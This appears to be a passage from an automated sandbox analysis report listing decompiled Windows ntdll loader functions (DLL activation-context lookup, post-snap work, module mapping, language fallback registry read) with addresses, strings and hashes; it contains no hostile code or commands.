					 *0x393b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03879B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3935780 & 0x00000005) != 0) {
						_push(_t49);
						E038C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x03878e0f
0x03878e16
0x03878e19
0x03878e1b
0x03878e21
0x03878e7f
0x03878e85
0x038b9354
0x038b936c
0x038b9371
0x038b937b
0x038b9381
0x038b9381
0x038b937b
0x03878e9d
0x03878e9d
0x03878e29
0x03878e2c
0x03878e38
0x03878e3e
0x03878e43
0x03878eb5
0x03878eb9
0x038b92aa
0x038b92af
0x038b92e8
0x038b92e8
0x038b92af
0x03878eb9
0x03878e45
0x03878e53
0x03878e5b
0x03878e5f
0x03878e78
0x03878e78
0x03878e7d
0x03878ec3
0x03878ecd
0x03878ed2
0x03878ed2
0x03878ec5
0x03878ec5
0x00000000
0x03878e7d
0x03878e67
0x03878ea4
0x038b931a
0x00000000
0x00000000
0x038b9320
0x03878ea4
0x03878e70
0x038b9325
0x038b9340
0x038b9345
0x038b9345
0x03878e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 038B9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 038B932A
LdrpFindDllActivationContext, xrefs: 038B9331, 038B935D
minkernel\ntdll\ldrsnap.c, xrefs: 038B933B, 038B9367

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: bf992a210a3cab6085ffb8c0702348855aec59b24c2004a00dd2130f0b225335
Instruction ID: 2b1df67f9b7a283ec9d8d490f3793beadce6af0c9f4ff41be5f677559212f9e5
Opcode Fuzzy Hash: bf992a210a3cab6085ffb8c0702348855aec59b24c2004a00dd2130f0b225335
Instruction Fuzzy Hash: 75411973A203159FDF24EAD8C84FA7AB7B6AB05218F0D41E9E818D7151E770ED80C283

Uniqueness

Uniqueness Score: -1.00%

Function 03858794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E03858794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0385934A() != 0) {
								_t159 = E038CA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3935780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E038C5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3935780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0385849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03858999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03858999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3935c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3935c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03862280(_t92, 0x39386cc);
															_t94 = E03919DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E038761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3935c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03858A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3935c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3935c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0388F380(_t136, 0x3821184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03862280(_t108, 0x39386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E038761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03919D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0385FFB0(_t118, _t156, 0x39386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03889A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x03858799
0x0385879d
0x038587a1
0x038587a3
0x038587a8
0x038587c3
0x038587c3
0x038587c8
0x038587d1
0x038587d4
0x038587d8
0x038587e5
0x038587ec
0x038a9bfe
0x038a9c00
0x038a9c02
0x038a9c08
0x038a9c0d
0x038a9c0f
0x038a9c14
0x038a9c2d
0x038a9c32
0x038a9c37
0x038a9c3a
0x038a9c3c
0x038a9c42
0x038a9c42
0x038a9c3c
0x038a9c02
0x038587da
0x038587df
0x038587e3
0x00000000
0x00000000
0x038587e3
0x038587f2
0x00000000
0x038587fb
0x038587fd
0x038587fe
0x0385880e
0x0385880f
0x03858810
0x03858814
0x0385881a
0x0385881c
0x0385881f
0x03858821
0x03858822
0x03858824
0x03858826
0x0385882c
0x0385882e
0x038a9c48
0x038a9c48
0x03858834
0x03858834
0x03858837
0x00000000
0x00000000
0x03858837
0x0385882e
0x0385883d
0x03858840
0x03858843
0x03858846
0x03858849
0x0385884c
0x0385884e
0x03858850
0x03858852
0x03858854
0x03858857
0x038588b4
0x038588b6
0x038588b6
0x03858859
0x03858859
0x03858859
0x03858861
0x03858866
0x0385886a
0x0385893d
0x03858941
0x00000000
0x03858947
0x03858947
0x0385894a
0x0385894c
0x00000000
0x03858952
0x03858955
0x0385895a
0x0385895d
0x0385895d
0x0385895f
0x03858961
0x03858961
0x03858968
0x00000000
0x00000000
0x0385896a
0x0385896b
0x0385896e
0x00000000
0x03858970
0x03858970
0x03858970
0x03858970
0x03858972
0x03858972
0x03858974
0x00000000
0x0385897a
0x0385897a
0x0385897d
0x00000000
0x03858983
0x038a9c65
0x038a9c6d
0x038a9c72
0x038a9c75
0x038a9c75
0x038a9c82
0x038a9c86
0x038a9c87
0x038a9c88
0x038a9c89
0x038a9c8c
0x038a9c90
0x038a9c95
0x038a9c97
0x038a9ca0
0x038a9ca3
0x038a9ca9
0x038a9ca9
0x00000000
0x038a9ca9
0x038a9ca3
0x00000000
0x038a9c97
0x0385897d
0x00000000
0x03858974
0x03858988
0x03858992
0x03858996
0x00000000
0x03858996
0x0385894c
0x00000000
0x03858870
0x0385887b
0x0385887d
0x0385887f
0x03858881
0x03858884
0x03858884
0x03858886
0x03858889
0x0385888c
0x0385888e
0x03858891
0x03858891
0x03858898
0x00000000
0x00000000
0x0385889a
0x0385889b
0x0385889e
0x00000000
0x00000000
0x038588a0
0x038588a8
0x038588b0
0x038588b2
0x038588d3
0x038588d5
0x00000000
0x038588d7
0x038588db
0x038588dc
0x038588e0
0x038588e8
0x038588ee
0x038588f0
0x038588f3
0x038588fc
0x03858901
0x03858906
0x0385890c
0x0385890c
0x0385890f
0x03858916
0x03858917
0x03858918
0x03858919
0x0385891a
0x0385891f
0x03858921
0x038a9c52
0x038a9c55
0x038a9c5b
0x038a9cac
0x038a9cc0
0x038a9cc0
0x038a9c55
0x03858927
0x03858927
0x0385892f
0x03858933
0x00000000
0x038588f5
0x038588f5
0x00000000
0x038588f7
0x038588f7
0x038588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x038588fa
0x038588f5
0x038588f3
0x00000000
0x038588d5
0x00000000
0x038588b2
0x038588c9
0x00000000
0x038588c9
0x0385887f
0x0385886a
0x03858857
0x03858852
0x038588bf
0x038588bf
0x038587aa
0x038587ad
0x038587ae
0x038587b4
0x038587b5
0x038587b6
0x038587b8
0x038587bd
0x038587c1
0x038587f4
0x038587fa
0x00000000
0x00000000
0x00000000
0x038587c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 038A9C18
LdrpDoPostSnapWork, xrefs: 038A9C1E
minkernel\ntdll\ldrsnap.c, xrefs: 038A9C28

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 99ce9ba9bb993cc807fa42f68fe21f9de9cfd6bf1bed66ee35b934c262f0f2dc
Instruction ID: 684fb68abe0542f93d90700b69915b5de3b316e1461982d4b8a377d0b9f46368
Opcode Fuzzy Hash: 99ce9ba9bb993cc807fa42f68fe21f9de9cfd6bf1bed66ee35b934c262f0f2dc
Instruction Fuzzy Hash: 4891CF75B0061A9FDB18DFD8C481ABAB7B5FF85315B1940EAEC05EB240EB30E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03857E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03857E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0385CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0384C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3935780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E038C5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3935780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03867D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03867D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E038C7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03867D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03867D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E038C7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0387A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0384B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x03857e4c
0x03857e50
0x03857e55
0x03857e58
0x03857e5d
0x03857e71
0x03857f33
0x03857e77
0x03857e77
0x03857e79
0x03857e79
0x03857e7e
0x03857f45
0x038a9848
0x00000000
0x038a9848
0x03857f4e
0x03857f53
0x03857f5a
0x00000000
0x00000000
0x038a985a
0x038a9862
0x038a9866
0x00000000
0x038a986c
0x00000000
0x038a986c
0x03857e84
0x03857e84
0x03857e8d
0x038a9871
0x03857eb8
0x03857ec0
0x03857ec0
0x03857e9a
0x038a987e
0x00000000
0x00000000
0x038a9884
0x038a988b
0x038a98a7
0x038a98ac
0x038a98b1
0x038a98b6
0x038a98b8
0x038a98b8
0x038a98b9
0x00000000
0x038a98b9
0x03857ea0
0x03857ea7
0x00000000
0x00000000
0x03857eac
0x03857eb1
0x03857ec6
0x03857ed0
0x038a98cc
0x03857ed6
0x03857ed6
0x03857ed6
0x03857ede
0x03857ee3
0x038a98e3
0x038a98f0
0x038a9902
0x038a98f2
0x038a98fb
0x038a98fb
0x038a9907
0x038a991d
0x038a991d
0x038a9907
0x038a98e3
0x03857ef0
0x03857f14
0x03857f14
0x03857f1e
0x038a9946
0x03857f24
0x03857f24
0x03857f24
0x03857f2c
0x038a996a
0x038a9975
0x038a9975
0x038a997e
0x038a9993
0x038a9993
0x038a997e
0x00000000
0x03857ef2
0x03857efc
0x03857f0a
0x03857f0e
0x038a9933
0x00000000
0x038a9933
0x00000000
0x03857f0e
0x00000000
0x00000000
0x00000000
0x03857eb1

Strings

LdrpCompleteMapModule, xrefs: 038A9898
Could not validate the crypto signature for DLL %wZ, xrefs: 038A9891
minkernel\ntdll\ldrmap.c, xrefs: 038A98A2

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 50bf36d31771d1552c96e619cc17c758303ecbff80d2f4a52e5fafe6f2e78409
Instruction ID: fa31b072b8e7219fb901455f69455179f9f0b813126110d046cc4606c790f09c
Opcode Fuzzy Hash: 50bf36d31771d1552c96e619cc17c758303ecbff80d2f4a52e5fafe6f2e78409
Instruction Fuzzy Hash: 1B51D031648B889BEB21CBECC944B2ABBA4AB01B18F0845D9FD55DB7D1D734ED00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0384E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0384E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0384F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E038895D0();
						}
						if(_t78 != 0) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0388FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0388BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03889600();
					if(_t97 < 0) {
						goto L6;
					}
					E0388BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0384F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0388BB40(_t83, _t102 + 0x24, _t78);
								if(L038543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0388BB40(_t84, _t102 + 0x24, _t94);
									if(L038543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0384e620
0x0384e628
0x0384e62f
0x0384e631
0x0384e635
0x0384e637
0x0384e63e
0x038a5503
0x038a5503
0x0384e64c
0x0384e64c
0x0384e651
0x00000000
0x00000000
0x0384e661
0x0384e665
0x038a542a
0x0384e715
0x0384e71a
0x0384e71c
0x0384e720
0x0384e720
0x0384e727
0x0384e736
0x0384e736
0x0384e743
0x0384e743
0x0384e673
0x0384e678
0x0384e67d
0x0384e682
0x0384e685
0x0384e692
0x0384e69b
0x0384e6a3
0x0384e6ad
0x0384e6b1
0x0384e6b2
0x0384e6bb
0x0384e6bf
0x0384e6c0
0x0384e6c8
0x0384e6cc
0x0384e6d5
0x0384e6d9
0x00000000
0x00000000
0x0384e6e5
0x0384e6ea
0x0384e6f9
0x0384e70b
0x0384e70f
0x038a5439
0x038a545e
0x038a545e
0x00000000
0x038a545e
0x038a543b
0x038a543e
0x038a5440
0x038a5445
0x038a5472
0x038a5475
0x038a548d
0x038a5493
0x038a54a9
0x00000000
0x00000000
0x038a54ab
0x038a54b4
0x038a54bc
0x038a54c8
0x038a54de
0x038a54fb
0x038a54e0
0x038a54e6
0x038a54eb
0x038a54eb
0x038a54de
0x00000000
0x038a54bc
0x038a5477
0x038a547a
0x038a5480
0x038a5483
0x038a5486
0x038a548b
0x00000000
0x00000000
0x00000000
0x038a548b
0x00000000
0x00000000
0x00000000
0x00000000
0x038a5447
0x038a5447
0x038a5447
0x038a5447
0x038a544e
0x00000000
0x00000000
0x038a5450
0x038a5452
0x038a5455
0x038a545a
0x00000000
0x00000000
0x00000000
0x038a545c
0x038a546a
0x038a546d
0x038a546f
0x00000000
0x038a546f
0x0384e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0384E68C
InstallLanguageFallback, xrefs: 0384E6DB
@, xrefs: 0384E6C0

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: abb417fb321070a545c8b204cfa7c16e3d4b4f2bd46b20827bb07a41c218a4b3
Instruction ID: 458a680764bcea8cc1cc05c1263b73c35d6d2b0cc9f0c47b87aecfc8ef5ac0ed
Opcode Fuzzy Hash: abb417fb321070a545c8b204cfa7c16e3d4b4f2bd46b20827bb07a41c218a4b3
Instruction Fuzzy Hash: B351F5B65053499BD710DFA9C440A6BF3E8BF89724F0909AEF985D7210F734DA44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 038C51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E038C51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x39205f0);
				E0389D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0385EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
